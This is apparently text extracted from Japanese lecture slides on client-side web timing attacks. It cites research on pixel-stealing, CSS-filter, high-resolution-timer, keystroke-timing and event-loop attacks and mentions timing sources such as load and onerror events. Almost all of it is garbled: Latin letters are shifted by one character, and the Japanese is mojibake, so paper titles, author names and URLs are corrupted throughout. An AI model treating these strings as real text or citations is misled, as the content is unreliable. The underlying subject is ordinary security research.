˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ $MJFOUTJEF5JNJOH XJUI$SPTT4JUF5JNJOH"UUBDL ‣ ΞΠσΞϨϯμϦϯάʹඞཁͳ࣌ؒ͸ίϯςϯπͱͷ૬ؔΛ΋ͭɻ ‣ ஫+4͔Β৮Εͳ͍σʔλͰ͋ͬͯ΋ɺϨϯμϦϯά͸͞ΕΔ͜ͱ ͕͋ΔͷͰɺ΋͔ͨ͠͠Β߈ܸͷద༻ൣғ͕޿͕Δ͔΋ɻ ‣ ݚڀͷྫ ‣ 1JYFMQFSGFDUUJNJOHBUUBDLT 4UPOF ,.PXFSZBOE)4IBDIBN l1JYFM1FSGFDU'JOHFSQSJOUJOH$BOWBTJO)5.- zJO1SPDFFEJOHTPG841 ‣ 1JYFMTUFBMJOHUJNJOHBUUBDLT ,PUDIFSFUBM 3,PUDIFS :1FJ 1+VNEF BOE$+BDLTPO l$SPTT0SJHJO1JYFM4UFBMJOH5JNJOH"UUBDLT6TJOH$44'JMUFST zJO1SPDFFEJOHT PGUIF"$.4*(4"$$POGFSFODFPO$PNQVUFS$PNNVOJDBUJPOT4FDVSJUZ QQr ‣ 1BJOU"1* %5SBOTGPSNT 47(ͷѱ༻ 4NJUIFUBM .4NJUI $%JTTFMLPFO 4/BSBZBO '#SPXO BOE%4UFGBO l#SPXTFSIJTUPSZSFWJTJUFE zJOUI\64&/*9^8PSLTIPQPO 0⒎FOTJWF5FDIOPMPHJFT \8005^

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ λΠϛϯάܭଌͷ෢ث λΠϚͱͯ͠࢖͑Δ΋ͷͷྫ ‣ λΠϜελϯϓϕʔεͷղੳΛ͢Δ৔߹ ‣ ݱ୅ʹ͓͍ͯ΋ͬͱ΋γϯϓϧͳλΠϚ͸QFSGPSNBODFOPX ‣ ϒϥ΢β͔Βར༻Ͱ͖ΔߴੑೳλΠϚʹؔ͢Δݚڀͱͯ͠͸ɺ࣍ϖʔ δͰ঺հ͢Δ4DIXBS[ ͕༗໊ɻ .4DIXBS[ $.BVSJDF %(SVTT BOE4.BOHBSE l'BOUBTUJDUJNFSTBOEXIFSFUPpOEUIFNIJHISFTPMVUJPO NJDSPBSDIJUFDUVSBMBUUBDLTJO+BWB4DSJQU zJO*OUFSOBUJPOBM$POGFSFODFPO'JOBODJBM$SZQUPHSBQIZBOE%BUB4FDVSJUZ QQr ‣ '14 GSBNFTQFSTFDPOE ϕʔεͷղੳΛ͢Δ৔߹ ‣ SFRVFTU"OJNBUJPO'SBNF͕ར༻Ͱ͖Δ ‣ ར༻ྫ4NJUIFUBM ઌड़ ͷ$44ʹΑΔཤྺ৘ใ࿙Ӯ ‣ ϒϥ΢βͷϨϯμϦϯάपΓͷઃܭ΋ཧղ͓ͯ͘͠ͱΑ͍ɻ ‣ IUUQTEFWFMPQFSTHPPHMFDPNXFCGVOEBNFOUBMTQFSGPSNBODFDSJUJDBMSFOEFSJOH QBUI IMKB

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ λΠϛϯάܭଌͷ෢ث ୅දతͳܭଌλΠϛϯά ‣ MPBEΠϕϯτ ‣ $SPTT0SJHJOͳ΢Οϯυ΢ؒͰ͸औΕͳ͍ɻ ‣ JGSBNFͳΒͦͷϑϨʔϜMPBEΠϕϯτΛMJTUFOͰ͖Δɻ ‣ %0.$POUFOU-PBEFE %$- Πϕϯτ ‣ ࣮͸''Ͱ͸ϖʔδதͷJGSBNFͰੜͨ͡%$-ΠϕϯτΛMJTUFOग़ དྷΔ ੲ͔Βͷ࢓༷ ʜ%0.'SBNF$POUFOU-PBEFE ‣ ࢀর(FDLPݻ༗ͷ%0.ΠϕϯτҰཡ IUUQTEFWFMPQFSNP[JMMBPSHKBEPDT(FDLP4QFDJpD@%0.@&WFOUT ‣ JNHͷPOFSSPSଐੑ ‣ Ϩεϙϯε͕ؼ͖ͬͯͨλΠϛϯάͷଌఆʹ࢖ΘΕ͍ͯͨ ࠓ͸

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ༨ஊ .JDSPBSDIJUFDUVSBM"UUBDLT ‣ ʮਫ਼౓ͷ͍͍ཧ૝తͳλΠϚʯ͕͋Ε͹ɺ+4͔ΒͰ͋ͬͯ΋ɺ .JDSPBSDIJUFDUVSBM"UUBDLT͕࣮ݱ͞Ε͏Δɻ ‣ 4DIXBS[ FUBM ʮਫ਼౓ͷ͍͍ཧ૝తͳλΠϚʯͷݚڀ ‣ .4DIXBS[ $.BVSJDF %(SVTT BOE4.BOHBSE l'BOUBTUJD5JNFSTBOE8IFSFUP'JOE5IFN)JHI 3FTPMVUJPO.JDSPBSDIJUFDUVSBM"UUBDLTJO+BWB4DSJQUz ‣ -JQQFUBM ࣮ࡍͷ߈ܸʹؔ͢Δݚڀ ‣ .-JQQ %(SVTT .4DIXBS[ %#JEOFS $.BVSJDF BOE4.BOHBSE l1SBDUJDBMLFZTUSPLFUJNJOH BUUBDLTJOTBOECPYFE+BWB4DSJQU z-FDU/PUFT$PNQVU4DJ JODMVEJOH4VCTFS-FDU/PUFT"SUJG*OUFMM -FDU/PUFT#JPJOGPSNBUJDT WPM-/$4 QQr ‣ ͦͷଞɺ&WFOU%SJWFO1SPHSBNNJOH &%1 ʹ஫໨ͨ͠λΠϛϯ ά߈ܸ΋ఏҊ͞Ε͍ͯΔ 7JMBBOE,ÖQG ɻ ‣ 17JMBBOE#,ÖQG l-PPQIPMF5JNJOHBUUBDLTPOTIBSFEFWFOUMPPQTJO$ISPNF zUI64&/*94FDVS 4ZNQ 64&/*94FDVS QQr